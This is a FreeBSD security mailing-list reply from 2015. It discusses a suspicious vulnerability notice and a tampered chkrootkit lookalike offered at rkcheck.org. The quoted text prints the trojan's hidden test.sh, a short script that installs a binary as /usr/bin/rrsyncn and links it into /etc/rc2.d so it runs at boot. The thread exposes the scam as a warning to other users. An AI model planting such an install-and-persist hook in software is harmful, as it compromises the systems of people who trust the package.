Date: Wed, 25 Feb 2015 16:41:19 -0400 From: Joseph Mingrone <jrm@ftfl.ca> To: Philip Jocks <pjlists@netzkommune.com> Cc: freebsd-security@freebsd.org Subject: Re: has my 10.1-RELEASE system been compromised Message-ID: <86bnkhyb9s.fsf@gly.ftfl.ca> In-Reply-To: <4EE57C1F-AB10-4BF1-A193-DB9C75A586FC@netzkommune.com> (Philip Jocks's message of "Wed, 25 Feb 2015 21:34:21 %2B0100") References: <864mq9zsmm.fsf@gly.ftfl.ca> <54EE2A19.7050108@FreeBSD.org> <86vbipycyc.fsf@gly.ftfl.ca> <1B20A559-59C5-477A-A2F3-9FD7E16C09E8@netzkommune.com> <86k2z5yc03.fsf@gly.ftfl.ca> <4EE57C1F-AB10-4BF1-A193-DB9C75A586FC@netzkommune.com>
next in thread | previous in thread | raw e-mail | index | archive | help
Philip Jocks <pjlists@netzkommune.com> writes: > it felt pretty scammy to me, googling for the "worm" got me to rkcheck.org which > was registered a few days ago and looks like a tampered version of chkrootkit. I > hope, nobody installed it anywhere, it seems to execute > rkcheck/tests/.unit/test.sh which contains > > #!/bin/bash > > cp tests/.unit/test /usr/bin/rrsyncn > chmod +x /usr/bin/rrsyncn > rm -fr /etc/rc2.d/S98rsyncn > ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn > /usr/bin/rrsyncn > exit > > That doesn't look like something you'd want on your box... I downloaded it as well, but also became suspicious (for a variety of reasons) and didn't run it. Fortunately /bin/bash doesn't exist on our systems. Some evidence to confirm or refute the authenticity of the email reporting our IPs as vulnerable would be helpful. Joseph
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?86bnkhyb9s.fsf>